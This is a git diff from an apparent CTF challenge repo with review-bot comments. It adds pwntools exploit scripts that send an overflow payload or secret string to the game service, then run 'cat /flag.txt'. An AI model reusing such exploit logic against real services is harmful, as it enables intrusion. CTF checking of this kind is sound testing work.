diff --git a/checker.py b/checker.py
new file mode 100644
index 0000000..25fe214
--- /dev/null
+++ b/checker.py
@@ -0,0 +1,101 @@
+#! /usr/bin/env python2
+from pwn import process, remote
+
+HOST = "192.168.2.20"
+TOTAL_TEAMS = 10
+FORMAT = "SlashRootCTF"
+
+
+def run():
+ # return process(FILENAME)
+ return remote("127.0.0.1", 60204)
+
+
+def poc0(host, port):
+ p = remote(host, port)
+ p.recvuntil(">")
+ p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
+ if "young" in p.recvuntil(">"):
+ p.sendline("y")
+ p.recvuntil(">")
+ p.sendline("2")
+ p.recvuntil(">")
+ p.sendline("4")
+ p.recvuntil(">")
+ p.sendline("y")
+ for _ in xrange(10):
+ p.recvuntil(">")
+ p.sendline("99")
+ p.sendline("cat /flag.txt")
+ flag = p.recv(46)
+ if FORMAT in flag:
+ return True
+ else:
+ return False
+ else:
+ return False
+
+
+def poc1(host, port):
+ p = remote(host, port)
+ p.recvuntil(">")
+ p.sendline("Leo")
+ p.recvuntil(">")
+ p.sendline("y")
+ for _ in range(2):
+ p.recvuntil(">")
+ p.sendline("3")
+ p.recvuntil(">")
+ p.sendline("0")
+ if "Who" in p.recvuntil(">"):
+ return False
+ p.sendline("y")
+ p.recvuntil(">")
+ p.sendline("1")
+ p.recvuntil(">")
+ p.sendline("4")
+ p.recvuntil(">")
+ p.sendline("y")
+ for _ in range(10):
+ p.recvuntil(">")
+ p.sendline("99")
+ p.sendline("cat /flag.txt")
+ flag = p.recv(46)
+ if FORMAT in flag:
+ return True
+ else:
+ return False
+
+
+def poc2(host, port):
+ p = remote(host, port)
+ p.recvuntil(">")
+ p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
+ p.recvuntil(">")
+ p.sendline("y")
+ p.recvuntil(">")
+ p.sendline("6")
+ if "Lv: 1000000" in p.recvuntil(">"):
+ p.sendline("2")
+ p.recvuntil(">")
+ p.sendline("4")
+ p.recvuntil(">")
+ p.sendline("y")
+ for _ in xrange(10):
+ p.recvuntil(">")
+ p.sendline("99")
+ p.sendline("cat /flag.txt")
+ flag = p.recv(46)
+ if FORMAT in flag:
+ return True
+ else:
+ return False
+ else:
+ return False
+
+
+if __name__ == "__main__":
+ for i in range(1):
+ print poc0(HOST, (60004 + (i*100)))
+ print poc1(HOST, (60004 + (i*100)))
+ print poc2(HOST, (60004 + (i*100)))
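Review bot: Each of `poc0`, `poc1` and `poc2` in checker.py can hang or misreport a result, because every `p.recvuntil(">")` runs without a timeout, the flag is read with a single `p.recv(46)` that may return fewer bytes than requested, and the connection is never closed. For a script that appears to report per-service status, a stalled or half-closed service should count as a failed check rather than block the loop or end the run with an uncaught `EOFError`. I would read the flag with `flag = p.recvn(46, timeout=5)`, pass `timeout=` to the `recvuntil` calls, and wrap each body in `try` / `except EOFError: return False` / `finally: p.close()`. The closing sequence (the `"y"` line, ten `"99"` lines, the flag read and the `FORMAT` test) is repeated verbatim in all three functions and would sit better in one helper; `run()`, `TOTAL_TEAMS` and the `process` import are unused, the `__main__` loop is `range(1)`, and `xrange` and `range` are mixed.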
diff --git a/lib/UserInterface.cpp b/lib/UserInterface.cpp index a8ad00c..f1776fe 100644 --- a/lib/UserInterface.cpp +++ b/lib/UserInterface.cpp @@ -1,7 +1,7 @@ #include "UserInterface.hpp" -const int UserInterface::INTERVAL = 100; -const int UserInterface::MINI_INTERVAL = 50; +const int UserInterface::INTERVAL = 0; +const int UserInterface::MINI_INTERVAL = 0; const int UserInterface::MAX_DAY = 28; const int UserInterface::MAX_MONTH = 12; const int UserInterface::MAX_YEAR = 100; @@ -225,4 +225,4 @@ void UserInterface::characterInfo(Character &c) << "\n Xp: " << c.getExperience() << "\n next: " << c.toNextLevel() << "\n++++++++++++++++++++++++" << std::endl; -} \ No newline at end of file +} diff --git a/poc.py b/poc.py index e8bf076..2fbe954 100644 --- a/poc.py +++ b/poc.py @@ -4,7 +4,7 @@ FILENAME = "./spell-warz-again-final" def run(): # return process(FILENAME) - return remote("103.200.7.150", 60104) + return remote("127.0.0.1", 60204) def poc0(): p = run() @@ -52,7 +52,7 @@ def poc1(): def poc2(): p = run() print p.recvuntil(">") - p.sendline("__th3_w0rLd_D3str0Y3r__") + p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") print p.recvuntil(">") p.sendline("y") print p.recvuntil(">") diff --git a/spell-warz-again-final b/spell-warz-again-final new file mode 100755 index 0000000..4843900 Binary files /dev/null and b/spell-warz-again-final differ diff --git a/spell-warz-again-final-patched b/spell-warz-again-final-patched new file mode 100755 index 0000000..cdfa517 Binary files /dev/null and b/spell-warz-again-final-patched differ
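Review bot: `INTERVAL` and `MINI_INTERVAL` are set to `0` in the first hunk of lib/UserInterface.cpp with no comment saying why the delays are removed. Their uses are outside this hunk, so this is an inference, but if they pace the text interface then zeroing them also removes whatever throttling they gave a network-exposed service against scripted clients. If the reason is faster automated checking, I would say so next to the constants, e.g. `// Delays set to 0 for the hosted build so automated checks finish quickly`, or make the two values a build-time option instead of editing them in place.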
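Review bot: `run()` in poc.py still hard-codes its target, now `remote("127.0.0.1", 60204)`, so every change of environment needs a source edit and leaves deployment addresses in the repository history, as the removed line shows. checker.py already passes `host` and `port` into its functions; doing the same here, e.g. `def run(host="127.0.0.1", port=60204):` with `return remote(host, port)` and the values taken from the command line, would avoid that. The copy of `run()` added in checker.py carries the same literal and is never called there.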